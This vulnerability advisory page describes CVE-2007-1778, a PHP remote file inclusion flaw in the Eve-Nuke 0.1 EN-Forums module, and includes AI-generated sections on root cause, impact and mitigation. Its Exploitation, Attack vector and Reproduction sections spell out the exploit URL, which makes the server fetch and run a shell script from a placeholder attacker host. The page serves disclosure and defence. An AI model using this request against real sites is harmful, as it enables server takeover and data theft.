CVE-2007-1778
Description
PHP remote file inclusion in Eve-Nuke 0.1 EN-Forums module allows arbitrary code execution via phpbb_root_path parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PHP remote file inclusion in Eve-Nuke 0.1 EN-Forums module allows arbitrary code execution via phpbb_root_path parameter.
Vulnerability
The vulnerability resides in db/mysql.php of the EN-Forums module for PHP-Nuke, version 0.1. The script unsafely uses require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx); without sanitizing the $phpbb_root_path variable. An attacker can supply a URL via the phpbb_root_path parameter, leading to a remote file inclusion (RFI) flaw [1].
Exploitation
An attacker sends a crafted HTTP request to modules/EN-Forums/db/mysql.php with the phpbb_root_path parameter set to a URL hosting malicious PHP code. No authentication or prior access is required; only network connectivity to the target is needed. The exploit URL pattern is http://target/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://attacker/shell.txt? (the trailing ? prevents appending local path components). The remote file is included and executed by the server [1].
Impact
Successful exploitation allows arbitrary PHP code execution with the privileges of the web server user. This can lead to full compromise of the web application, including data theft, defacement, or further attacks on the underlying system [1].
Mitigation
No official patch or fix has been released for this vulnerability. The EN-Forums module (Eve-Nuke 0.1) appears to be abandoned. Administrators should immediately remove or disable the module from their PHP-Nuke installation. As of the publication date, no workaround is available, and the issue is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- cpe:2.3:a:eve-nuke:eve-nuke_forum:0.1:*:*:*:*:*:*:*
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Unsanitized use of the `phpbb_root_path` parameter in a `require()` call allows remote file inclusion."
Attack vector
An attacker sends an HTTP GET request to `db/mysql.php` with the `phpbb_root_path` parameter set to a URL pointing to a remote shell (e.g., `http://www.site.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://attacker.com/shell.txt?`). The `require()` call then includes the attacker-controlled remote file, allowing arbitrary PHP code execution [ref_id=1]. No authentication or special privileges are required.
Affected code
The vulnerable code is in `db/mysql.php` within the Eve-Nuke 0.1 (EN-Forums) module for PHP-Nuke. The file contains the statement `require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);` which directly uses the `$phpbb_root_path` variable without sanitization [ref_id=1].
What the fix does
No patch is provided in the bundle. The advisory does not specify a fix. To remediate, the `$phpbb_root_path` parameter should be sanitized to only allow local, predefined paths, and remote file inclusion should be disabled by setting `allow_url_include` to Off in PHP configuration.
Preconditions
- configThe PHP setting allow_url_include must be enabled for remote file inclusion to succeed.
- networkThe attacker must be able to reach the vulnerable db/mysql.php script over HTTP.
- authNo authentication is required.
- inputThe attacker supplies a URL via the phpbb_root_path GET parameter.
Reproduction
Visit `http://target.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://attacker.com/shell.txt?` where `shell.txt?` contains PHP code. The trailing `?` prevents the appended string from interfering with the remote file [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.